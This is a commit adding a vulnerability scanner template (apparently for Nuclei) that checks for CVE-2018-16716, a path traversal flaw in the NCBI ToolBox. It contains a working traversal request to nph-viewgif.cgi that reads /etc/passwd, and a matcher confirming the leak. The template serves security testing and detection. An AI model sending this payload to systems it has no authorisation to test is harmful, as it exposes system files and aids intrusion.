Merge pull request #3797 from Akokonunes/patch-123

Create CVE-2018-16716.yaml
2022-03-01 02:57:40 +05:30 · 2022-03-01 02:57:40 +05:30 · 47efd78230
parent 0e5f695141 857b1c1e4a
commit 47efd78230
1 changed files with 30 additions and 0 deletions
--- a/cves/2018/CVE-2018-16716.yaml
+++ b/cves/2018/CVE-2018-16716.yaml
@ -0,0 +1,30 @@
+id: CVE-2018-16716
+info:
+  name: NCBI ToolBox - Directory Traversal
+  author: 0x_Akoko
+  severity: high
+  description: A path traversal vulnerability exists in viewcgi.c in the 2.0.7 through 2.2.26 legacy versions of the NCBI ToolBox, which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.
+  reference:
+    - https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-16716
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2018-16716
+    cwe-id: CWE-22
+  tags: cve,cve2018,ncbi,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200